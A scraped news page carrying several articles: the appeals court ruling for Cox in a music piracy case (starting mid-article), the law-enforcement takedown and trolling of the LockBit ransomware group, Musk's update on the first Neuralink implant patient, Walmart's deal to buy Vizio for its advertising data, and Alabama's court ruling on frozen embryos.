If the correct legal standard had been used in the district court, “no reasonable jury could find that Cox received a direct financial benefit from its subscribers’ infringement of Plaintiffs’ copyrights,” judges wrote.

The case began when Sony and other music copyright holders sued Cox, claiming that it didn’t adequately fight piracy on its network and failed to terminate repeat infringers. A US District Court jury in the Eastern District of Virginia found the ISP liable for infringement of 10,017 copyrighted works.

Copyright owners want ISPs to disconnect users

Cox’s appeal was supported by advocacy groups concerned that the big-money judgment could force ISPs to disconnect more Internet users based merely on accusations of copyright infringement. Groups such as the Electronic Frontier Foundation also called the ruling legally flawed.

“When these music companies sued Cox Communications, an ISP, the court got the law wrong,” the EFF wrote in 2021. “It effectively decided that the only way for an ISP to avoid being liable for infringement by its users is to terminate a household or business’s account after a small number of accusations—perhaps only two. The court also allowed a damages formula that can lead to nearly unlimited damages, with no relationship to any actual harm suffered. If not overturned, this decision will lead to an untold number of people losing vital Internet access as ISPs start to cut off more and more customers to avoid massive damages.”

In today’s 4th Circuit ruling, appeals court judges wrote that “Sony failed, as a matter of law, to prove that Cox profits directly from its subscribers’ copyright infringement.”

A defendant may be vicariously liable for a third party’s copyright infringement if it profits directly from it and is in a position to supervise the infringer, the ruling said. Cox argued that it doesn’t profit directly from infringement because it receives the same monthly fee from subscribers whether they illegally download copyrighted files or not, the ruling noted.

The question in this type of case is whether there is a causal relationship between the infringement and the financial benefit. “If copyright infringement draws customers to the defendant’s service or incentivizes them to pay more for their service, that financial benefit may be profit from infringement. But in every case, the financial benefit to the defendant must flow directly from the third party’s acts of infringement to establish vicarious liability,” the court said.

Court blocks $1 billion copyright ruling that punished ISP for its users’ piracy Read More »

after-years-of-losing,-it’s-finally-feds’-turn-to-troll-ransomware-group

After years of losing, it’s finally feds’ turn to troll ransomware group

LOOK WHO’S TROLLING NOW —

Authorities who took down the ransomware group brag about their epic hack.

After years of losing, it’s finally feds’ turn to troll ransomware group

Getty Images

After years of being outmaneuvered by snarky ransomware criminals who tease and brag about each new victim they claim, international authorities finally got their chance to turn the tables, and they aren’t squandering it.

The top-notch trolling came after authorities from the US, UK, and Europol took down most of the infrastructure belonging to LockBit, a ransomware syndicate that has extorted more than $120 million from thousands of victims around the world. On Tuesday, most of the sites LockBit uses to shame its victims for being hacked, pressure them into paying, and brag of their hacking prowess began displaying content announcing the takedown. The seized infrastructure also hosted decryptors victims could use to recover their data.

The dark web site LockBit once used to name and shame victims, displaying entries such as

Enlarge / The dark web site LockBit once used to name and shame victims, displaying entries such as “press releases,” “LB Backend Leaks,” and “LockbitSupp You’ve been banned from Lockbit 3.0.”

this_is_really_bad

Authorities didn’t use the seized name-and-shame site solely for informational purposes. One section that appeared prominently gloated over the extraordinary extent of the system access investigators gained. Several images indicated they had control of /etc/shadow, a Linux file that stores cryptographically hashed passwords. This file, among the most security-sensitive ones in Linux, can be accessed only by a user with root, the highest level of system privileges.

Screenshot showing a folder named

Enlarge / Screenshot showing a folder named “shadow” with hashes for accounts including “root,” “daemon,” “bin,” and “sys.”

Other images demonstrated that investigators also had complete control of the main web panel and the system LockBit operators used to communicate with affiliates and victims.

Screenshot of a panel used to administer the LockBit site.

Enlarge / Screenshot of a panel used to administer the LockBit site.

Screenshot showing chats between a LockBit affiliate and a victim.

Enlarge / Screenshot showing chats between a LockBit affiliate and a victim.

The razzing didn’t stop there. File names of the images had titles including: “this_is_really_bad.png,” “oh dear.png,” and “doesnt_look_good.png.” The seized page also teased the upcoming doxing of LockbitSupp, the moniker of the main LockBit figure. It read: “Who is LockbitSupp? The $10m question” and displayed images of cash wrapped in chains with padlocks. Copying a common practice of LockBit and competing ransomware groups, the seized site displayed a clock counting down the seconds until the identifying information will be posted.

Screenshot showing

Enlarge / Screenshot showing “who is lockbitsupp?”

In all, authorities said they seized control of 14,000 accounts and 34 servers located in the Netherlands, Germany, Finland, France, Switzerland, Australia, the US, and the UK. Two LockBit suspects have been arrested in Poland and Ukraine, and five indictments and three arrest warrants have been issued. Authorities also froze 200 cryptocurrency accounts linked to the ransomware operation.

“At present, a vast amount of data gathered throughout the investigation is now in the possession of law enforcement,” Europol officials said. “This data will be used to support ongoing international operational activities focused on targeting the leaders of this group, as well as developers, affiliates, infrastructure, and criminal assets linked to these criminal activities.”

LockBit has operated since at least 2019 under the name “ABCD.” Within three years, it was the most widely circulating ransomware. Like most of its peers, LockBit operates under what’s known as ransomware-as-a-service, in which it provides software and infrastructure to affiliates who use it to compromise victims. LockBit and the affiliates then divide any resulting revenue. Hundreds of affiliates participated.

According to KrebsOnSecurity, one of the LockBit leaders said on a Russian-language crime forum that a vulnerability in the PHP scripting language provided the means for authorities to hack the servers. That detail led to another round of razzing, this time from fellow forum participants.

“Does it mean that the FBI provided a pen-testing service to the affiliate program?” one participant wrote, according to reporter Brian Krebs. “Or did they decide to take part in the bug bounty program? :):).”

Several members also posted memes taunting the group about the security failure.

“In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head—offering $10 million to anyone who could discover his real name,” Krebs wrote. “‘My god, who needs me?’ LockBitSupp wrote on January 22, 2024. ‘There is not even a reward out for me on the FBI website.’”

After years of losing, it’s finally feds’ turn to troll ransomware group Read More »

musk-claims-neuralink-patient-doing-ok-with-implant,-can-move-mouse-with-brain

Musk claims Neuralink patient doing OK with implant, can move mouse with brain

Neuralink brain implant —

Medical ethicists alarmed by Musk being “sole source of information” on patient.

A person's hand holidng a brain implant device that is about the size of a coin.

Enlarge / A Neuralink implant.

Neuralink

Neuralink co-founder Elon Musk said the first human to be implanted with the company’s brain chip is now able to move a mouse cursor just by thinking.

“Progress is good, and the patient seems to have made a full recovery, with no ill effects that we are aware of. Patient is able to move a mouse around the screen by just thinking,” Musk said Monday during an X Spaces event, according to Reuters.

Musk’s update came a few weeks after he announced that Neuralink implanted a chip into the human. The previous update was also made on X, the Musk-owned social network formerly named Twitter.

Musk reportedly said during yesterday’s chat, “We’re trying to get as many button presses as possible from thinking. So that’s what we’re currently working on is: can you get left mouse, right mouse, mouse down, mouse up… We want to have more than just two buttons.”

Neuralink itself doesn’t seem to have issued any statement on the patient’s progress. We contacted the company today and will update this article if we get a response.

“Basic ethical standards” not met

Neuralink’s method of releasing information was criticized last week by Arthur Caplan, a bioethics professor and head of the Division of Medical Ethics at NYU Grossman School of Medicine, and Jonathan Moreno, a University of Pennsylvania medical ethics professor.

“Science by press release, while increasingly common, is not science,” Caplan and Moreno wrote in an essay published by the nonprofit Hastings Center. “When the person paying for a human experiment with a huge financial stake in the outcome is the sole source of information, basic ethical standards have not been met.”

Caplan and Moreno acknowledged that Neuralink and Musk seem to be “in the clear” legally:

Assuming that some brain-computer interface device was indeed implanted in some patient with severe paralysis by some surgeons somewhere, it would be reasonable to expect some formal reporting about the details of an unprecedented experiment involving a vulnerable person. But unlike drug studies in which there are phases that must be registered in a public database, the Food and Drug Administration does not require reporting of early feasibility studies of devices. From a legal standpoint Musk’s company is in the clear, a fact that surely did not escape the tactical notice of his company’s lawyers.

But they argue that opening “the brain of a living human being to insert a device” should have been accompanied with more public detail. There is an ethical obligation “to avoid the risk of giving false hope to countless thousands of people with serious neurological disabilities,” they wrote.

A brain implant could have complications that leave a patient in worse condition, the ethics professors noted. “We are not even told what plans there are to remove the device if things go wrong or the subject simply wants to stop,” Caplan and Moreno wrote. “Nor do we know the findings of animal research that justified beginning a first-in-human experiment at this time, especially since it is not lifesaving research.”

Clinical trial still to come

Neuralink has been criticized for alleged mistreatment of animals in research and was reportedly fined $2,480 for violating US Department of Transportation rules on the movement of hazardous materials after inspections of company facilities last year.

People “should continue to be skeptical of the safety and functionality of any device produced by Neuralink,” the nonprofit Physicians Committee for Responsible Medicine said after last month’s announcement of the first implant.

“The Physicians Committee continues to urge Elon Musk and Neuralink to shift to developing a noninvasive brain-computer interface,” the group said. “Researchers elsewhere have already made progress to improve patient health using such noninvasive methods, which do not come with the risk of surgical complications, infections, or additional operations to repair malfunctioning implants.”

In May 2023, Neuralink said it obtained Food and Drug Administration approval for clinical trials. The company’s previous attempt to gain approval was reportedly denied by the FDA over safety concerns and other “deficiencies.”

In September, the company said it was recruiting volunteers, specifically people with quadriplegia due to cervical spinal cord injury or amyotrophic lateral sclerosis. Neuralink said the first human clinical trial for PRIME (Precise Robotically Implanted Brain-Computer Interface) will evaluate the safety of its implant and surgical robot, “and assess the initial functionality of our BCI [brain-computer interface] for enabling people with paralysis to control external devices with their thoughts.”

Musk claims Neuralink patient doing OK with implant, can move mouse with brain Read More »

walmart-buying-tv-brand-vizio-for-its-ad-fueling-customer-data

Walmart buying TV-brand Vizio for its ad-fueling customer data

About software, not hardware —

Deal expected to close as soon as this summer.

Close-up of Vizio logo on a TV

Walmart announced an agreement to buy Vizio today. Irvine, California-based Vizio is best known for lower-priced TVs, but its real value to Walmart is its advertising business and access to user data.

Walmart said it’s buying Vizio for approximately $2.3 billion, pending regulatory clearance and additional closing conditions. Vizio can also terminate the transaction over the next 45 days if it accepts a better offer, per the announcement.

Walmart will keep selling non-Vizio TVs should the merger close, Seth Dallaire, Walmart US’s EVP and CRO who would manage Vizio post-acquisition, told The Wall Street Journal (WSJ).

Walmart expects the acquisition to be finalized as soon as this summer, it told WSJ.

Ad-pportunity

Walmart, including Sam’s Club, is typically Vizio’s biggest customer by sales, per a WSJ report last week on the potential merger. But Walmart’s acquisition isn’t about getting a bigger piece of the budget-TV market (Walmart notably already sells its own “onn.” budget TVs). Instead, Walmart is looking to boost its Walmart Connect advertising business.

Vizio makes money by selling ads, including those shown on the Vizio SmartCast OS and on free content available on its TVs with ads. Walmart said buying Vizio will give it new ways to appeal to advertisers and that those ad efforts would be further fueled by Walmart’s high-volume sales of TVs.

Walmart said today that Vizio’s Platform+ ad business has “over 500 direct advertiser relationships, including many of the Fortune 500” and that SmartCast users have grown 400 percent since 2018 to 18 million active accounts.

Walmart Connect (which was rebranded from Walmart Media Group in 2021) sells various types of ads, including adverts that appear on Walmart’s website and app. Walmart Connect also sells ads that display on in-store screens, including display TVs and point-of-sale machines, in over 4,700 locations (Walmart has over 10,500 stores).

Walmart makes most of its US revenue from low-profit groceries, WSJ noted last week, but ads are higher profit. Walmart has said that it wants Walmart Connect to be a top-10 advertising business. Alphabet, Amazon, and Meta are among the world’s biggest advertising companies today. In the fiscal year ending January 2023, Walmart said that its global ads business represented under 1 percent ($2.7 billion) of its total annual revenue. In its fiscal year 2024 Q4 earnings report released today [PDF], Walmart said its global ad business grew 33 percent, including 22 percent in the US, compared to Q4 2023.

Hungry for customer data

Owning Platform+ would give Walmart new information about TV users. Data gathered from Vizio TVs will be combined with data on shoppers that Walmart already gets. Walmart plans to use this customer data to sell targeted ad space, such as banners above Walmart.com search results, and to help advertisers track ad results.

With people only able to buy so many new TVs, vendors have been pushing for ways to make money off of already-purchased TVs. That means putting ads on TV OSes and TVs that gather customer data, including what users watch and which ads they click on, when possible. TV makers like Vizio, Amazon, and LG are increasingly focusing on ads as revenue streams.

Meanwhile, retailers like Walmart are also turning to ads for revenue. Through Vizio, Walmart is looking to add a business with the vast majority of gross profit coming from ads. Data acquired through SmartCast can shed light on ad effectiveness and improve ad targeting, Vizio tells advertisers.

In an interview with WSJ, Dallaire noted that smart TVs and streaming have turned the TV business into a software, not hardware, business. According to a spokesperson for Parks Associate that Ars Technica spoke with, Vizio has 12 percent of connected TV OS market share. WSJ reported last week that Roku OS has more market share at 25 percent; although, a graph that Parks Associates’ rep sent to me suggests the percentage is smaller (Parks Associates’ spokesperson wouldn’t confirm Roku OS’ market share or the accuracy of WSJ’s report to Ars). Roku OS is on Walmart’s “onn.” TVs, but Walmart doesn’t own Roku.

Vizio TVs could get worse

From the perspective of a company seeking to grow its ad business, buying Vizio seems reasonable. But from a user perspective, Vizio TVs risk becoming too centered on selling and measuring ads.

There was already a large financial incentive for Vizio to focus on growing Platform+ and the profitability of SmartCast (in its most recent earnings report, Vizio said its average revenue per SmartCast user increased 14 percent year over year to $31.55). For years, Vizio’s business has been more about selling ads than selling TVs. An acquisition focused on ads can potentially detract from a focus on improving Vizio hardware.

Stuffing more ads into TVs could also ruin the experience for people seeking a quality TV at a lower cost. While some people may be willing to sacrifice features and image quality to save money, others aren’t willing to deal with more ads and incessant interest in viewer tracking for that experience. With Vizio expected to become part of a conglomerate eager to grow its ad business, it’s possible that the ads experience on Vizio TVs could worsen.

Editor’s note: This article was edited to include information from Parks Associates. 

Walmart buying TV-brand Vizio for its ad-fueling customer data Read More »

frozen-embryos-are-“children,”-according-to-alabama’s-supreme-court

Frozen embryos are “children,” according to Alabama’s Supreme Court

frozen cell balls —

IVF often produces more embryos than are needed or used.

January 17, 2024, Berlin: In the cell laboratory at the Fertility Center Berlin, an electron microscope is used to fertilize an egg cell.

Enlarge / January 17, 2024, Berlin: In the cell laboratory at the Fertility Center Berlin, an electron microscope is used to fertilize an egg cell.

The Alabama Supreme Court on Friday ruled that frozen embryos are “children,” entitled to full personhood rights, and anyone who destroys them could be liable in a wrongful death case.

The first-of-its-kind ruling throws into question the future use of assisted reproductive technology (ART) involving in vitro fertilization for patients in Alabama—and beyond. For this technology, people who want children but face challenges to conceiving can create embryos in clinical settings, which may or may not go on to be implanted in a uterus.

In the Alabama case, a hospital patient wandered through an unlocked door, removed frozen, preserved embryos from subzero storage and, suffering an ice burn, dropped the embryos, destroying them. Affected IVF patients filed wrongful-death lawsuits against the IVF clinic under the state’s Wrongful Death of a Minor Act. The case was initially dismissed in a lower court, which ruled the embryos did not meet the definition of a child. But the Alabama Supreme Court ruled that “it applies to all children, born and unborn, without limitation.” In a concurring opinion, Chief Justice Tom Parker cited his religious beliefs and quoted the Bible to support the stance.

“Human life cannot be wrongfully destroyed without incurring the wrath of a holy God, who views the destruction of His image as an affront to Himself,” Parker wrote. “Even before birth, all human beings bear the image of God, and their lives cannot be destroyed without effacing his glory.”

In 2020, the US Department of Health and Human Services estimated that there were over 600,000 embryos frozen in storage around the country, a significant percentage of which will likely never result in a live birth.

The process of IVF generally goes like this: First, egg production is overstimulated with hormone treatments. Then, doctors harvest the eggs as well as sperm. The number of eggs harvested can vary, but doctors sometimes try to retrieve as many as possible, ranging from a handful to several dozen, depending on fertility factors. The harvested eggs are fertilized in a clinic, sometimes by combining them with sperm in an incubator or by the more delicate process of directly injecting sperm into a mature egg (intracytoplasmic sperm injection). Any resulting fertilized eggs may then go through additional preparations, including “assisted hatching,” which prepares the embryo’s membrane for attaching to the lining of the uterus, or genetic screening to ensure the embryo is healthy and viable.

Feared reality

This process sometimes yields several embryos, which is typically considered good because each round of IVF can have significant failure rates. According to national ART data collected by the Centers for Disease Control and Prevention, the percentage of egg retrievals that fail to result in a live birth ranges from 46 percent to 91 percent, depending on the patient’s age. The percentage of fertilized egg or embryo transfers that fail to result in a live birth ranges from 51 percent to 76 percent, depending on age. Many patients go through multiple rounds of egg retrievals and embryo transfers.

The whole IVF process often creates numerous embryos but leads to far fewer live births. In 2021, nearly 240,000 patients in the US had over 400,000 ART cycles, resulting in 97,000 live-born infants, according to the CDC.

People who have extra embryos from IVF can currently choose what to do with them, including freezing them for more cycles or future conception attempts, donating them to others wanting to conceive, donating them to research, or having them discarded.

But, if, as Alabama’s Supreme Court ruled, embryos are considered “children,” this could mean that any embryos that are destroyed or discarded in the process of IVF or afterward could be the subject of wrongful death lawsuits. The ruling creates potentially paralyzing liability for ART clinics and patients who use them. Doctors may choose to only attempt creating embryos one at a time to avoid liability attached to creating extras, or they may decline to provide IVF altogether to avoid liability when embryos do not survive the process. This could exacerbate the already financially draining and emotionally exhausting process of IVF, potentially putting it entirely out of reach for those who want to use the technology and putting clinics out of business.

Barbara Collura, CEO of RESOLVE: The National Infertility Association, told USA Today that the ruling would likely halt most IVF work in Alabama. “This is exactly what we have been fearful of and worried about where it was heading,” Collura said. “We are extremely concerned that this is now going to happen in other states.”

But the hypothetical risks don’t end there. Health advocates worry that the idea of personhood for an embryonic ball of a few cells could extend to pregnancy outcomes, such as miscarriages or the use of contraceptives.

Frozen embryos are “children,” according to Alabama’s Supreme Court Read More »